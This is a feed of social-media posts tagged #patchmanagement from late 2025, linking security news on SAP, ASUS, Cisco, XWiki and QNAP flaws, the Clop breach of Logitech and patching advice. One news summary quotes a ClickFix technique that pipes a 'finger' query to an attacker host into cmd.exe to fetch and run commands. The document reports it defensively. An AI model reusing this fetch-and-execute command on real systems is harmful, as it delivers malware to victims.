#patchmanagement

2025-12-16
15 YEARS of ADMIN | ADMIN Network & Security News
AllAboutSecurity @allaboutsecurity
2025-12-16

Comprehensive protection for business-critical SAP systems: strategies and best practices

With sophisticated attacks exploiting new vulnerabilities within 72 hours while companies need an average of three months for patching, the threat landscape is growing exponentially.

all-about-security.de/umfassen

2025-12-10

🔧 Yesterday, #SAP released 14 new security notes, including several critical ones. Highlights: • Solution Manager code-injection vuln (CVSS 9.9) • Fixes for Commerce Cloud, jConnect, Web Dispatcher/ICM 🔗 Learn more and patch today: support.sap.com/en/my-suppor... #SAPSecurity #PatchManagement

2025-12-05

Action1 announces expansion of its platform to include Linux patch management and autonomous endpoint management
admin-magazine.com/News/Action
#Action1 #Linux #PatchManagement #AEM #enterprise #automation #PowerShell

15 YEARS: ADMIN Network & Security News
Zevonix @zevonix
2025-12-02

📅 Outdated software = open doors for attackers.
⚠️ Always monitor end-of-life dates and upgrade before support ends.
👉 zurl.co/FK3Ru

Zevonix @zevonix
2025-11-26

⚙️ Outdated software is a hacker’s best friend.
🔒 Keep your operating system and apps updated—patches close security holes fast.
👉 zurl.co/SKauQ

2025-11-26

ASUS has patched a high-severity local privilege escalation flaw (CVE-2025-59373) in MyASUS that allowed elevation to NT AUTHORITY/SYSTEM via the System Control Interface Service. Patch now shipped through Windows Update with updated versions for x64 and ARM.

Full details:
technadu.com/asus-fixes-high-s

#infosec #vulnerability #ASUS #WindowsSecurity #patchmanagement #CVE2025

ASUS Fixes High-Severity MyASUS Vulnerability that Allows Privilege Escalation to SYSTEM-Level Access
2025-11-21

This week brought a cascade of urgent security patches as attackers accelerated their exploitation of newly discovered vulnerabilities across enterprise software.

#ZeroDay #Cybersecurity #Vulnerabilities #Malware #PatchManagement

cybernewsweekly.substack.com/p

2025-11-15

Morning, cyber pros! It's been a bit light on news over the last 24 hours, but we've still got some critical updates to chew on. We're looking at a major data breach, an actively exploited RCE vulnerability, an old protocol making a malicious comeback, and a significant legal crackdown on North Korean illicit activities. Let's dive in:

Logitech Hit by Clop Extortion ⚠️
- Hardware giant Logitech has confirmed a data breach following an extortion claim by the Clop gang, who leaked 1.8 TB of data.
- The breach stemmed from a third-party zero-day vulnerability, likely CVE-2025-61882 in Oracle E-Business Suite, which Clop actively exploited in July 2025.
- While Logitech states no sensitive national ID or credit card data was compromised, the incident highlights Clop's consistent use of zero-days in mass data theft campaigns, previously seen with Accellion, GoAnywhere, and MOVEit.

🤖 Bleeping Computer | bleepingcomputer.com/news/secu

RondoDox Botnet Exploiting XWiki RCE 🛡️
- The RondoDox botnet is actively exploiting CVE-2025-24893, a critical eval injection vulnerability (CVSS 9.8) in unpatched XWiki instances, to achieve arbitrary code execution.
- This flaw allows any guest user to execute remote code via a request to the "/bin/get/Main/SolrSearch" endpoint, and has been in the wild since at least March 2025.
- CISA added this to its KEV catalog, urging federal agencies to patch by November 20th. Exploitation attempts have surged, with RondoDox adding these devices to its botnet for DDoS attacks, alongside other actors deploying crypto miners and reverse shells.

📰 The Hacker News | thehackernews.com/2025/11/rond

'Finger' Protocol Abused for Malware Delivery 🕵️
- Threat actors are leveraging the decades-old 'finger' protocol (TCP port 79) to retrieve and execute remote commands on Windows devices in recent ClickFix malware attacks.
- The technique involves piping the output of a 'finger' command (e.g., `finger vke@finger.cloudmega[.]org`) directly into `cmd.exe`, causing the retrieved commands to run locally.
- Observed campaigns deliver Python-based infostealers or NetSupport Manager RAT, with some variants including anti-analysis checks for tools like Wireshark and Process Hacker. Defenders should block outgoing traffic to TCP port 79.

🤖 Bleeping Computer | bleepingcomputer.com/news/secu

US Cracks Down on North Korean IT Worker Fraud ⚖️
- Five U.S. citizens have pleaded guilty to assisting North Korea's illicit revenue generation by enabling IT worker fraud, impacting over 136 U.S. companies and generating $2.2 million for the DPRK regime.
- The schemes involved using stolen U.S. identities, hosting company laptops in "laptop farms," and facilitating remote access to make it appear workers were in the U.S.
- This legal action, alongside the forfeiture of over $15 million in cryptocurrency stolen by APT38 (BlueNoroff), underscores ongoing efforts to disrupt North Korea's funding for its weapons programmes.

📰 The Hacker News | thehackernews.com/2025/11/five

#CyberSecurity #ThreatIntelligence #DataBreach #Clop #Ransomware #ZeroDay #Vulnerability #RCE #XWiki #Botnet #DDoS #Malware #FingerProtocol #ClickFix #NorthKorea #DPRK #APT38 #BlueNoroff #Cybercrime #InfoSec #IncidentResponse #PatchManagement

hackmac @hackmac
2025-11-14

Many talk about cyber resilience, but the reality in the networks says otherwise: 39% of IT devices run without active endpoint protection, 77% of corporate networks are insufficiently segmented, 32.5% of devices operate outside IT control, 26% of Linux and 8% of Windows systems are outdated and unpatched.

2025-11-11

How do you organize your patch management?
(Servers, end-user devices, mobile devices, etc...)

#admin
#foss
#IT
#patchmanagement

2025-11-10

A single image on WhatsApp turned a Samsung Galaxy into a hacker’s playground—no click needed. How did this zero-day flaw let attackers spy on your phone? Find out the details behind the stealthy exploit.

thedefendopsdiaries.com/samsun

#samsung
#zeroday
#androidsecurity
#cve202521042
#spyware
#cyberespionage
#patchmanagement
#mobilevulnerabilities
#cisa

2025-11-09

QNAP's NAS devices just got hit with seven zero-day flaws at Pwn2Own Ireland 2025. Is your data really safe when hackers can break through live? Dive into the details before updating becomes a must.

thedefendopsdiaries.com/qnap-z

#qnap
#zeroday
#pwn2own
#nassecurity
#cybersecurity
#vulnerability
#dataprotection
#patchmanagement
#infosec

Mind Lude @mindlude
2025-11-07

Another day, another breach. The Congressional Budget Office confirms a hack, with whispers that an ancient, unpatched firewall is to blame. It's almost like patching is important or something. 😉 What's your biggest 'should've patched that' horror story? techcrunch.com/2025/11/07/cong

2025-11-07

Cisco firewalls are under fire—state-sponsored hackers exploiting zero-day flaws to force reboot loops and take down networks. Is your security ready for the threat? Learn what you need to know before it’s too late.

thedefendopsdiaries.com/exploi

#ciscofirewall
#zeroday
#dosattacks
#cybersecurity
#patchmanagement

2025-11-06

Cisco's latest UCCX flaw lets hackers run commands as root—opening the door to a cascade of vulnerabilities across your network. Is your system ready for this wake-up call?

thedefendopsdiaries.com/cisco-

#cisco
#vulnerabilities
#uccx
#cybersecurity
#patchmanagement

2025-11-05

A single overlooked input in CentOS Web Panel turned into a full-blown takeover—attackers hacked servers with no password needed. How did one bug spark such a cybersecurity uproar? Read on to get the inside scoop.

thedefendopsdiaries.com/centos

#centoswebpanel
#cve202548703
#vulnerabilityanalysis
#cybersecurity
#patchmanagement

2025-11-04

🔥 PatchMon: A platform for automating Linux patch monitoring! The FOSS (free and open) version has all the features of the paid version, lacking only support. Worth a look for self-hosters! #Linux #FOSS #BảoMật #TechVietNam #OpenSource #PatchManagement #HệThốngLinux #DevOps Vietnam 🇻🇳


reddit.com/r/selfhosted/commen

hackmac @hackmac
2025-11-02

Exchange in Germany: a legacy problem that was a long time coming! Tens of thousands of on-prem Exchange servers in Germany remain exposed, often unpatched, outdated, and with openly reachable services. As long as central communication systems are not treated as production assets of the "business-critical" tier, Exchange remains the perfect entry point, not because of APT magic but because of management deficits.
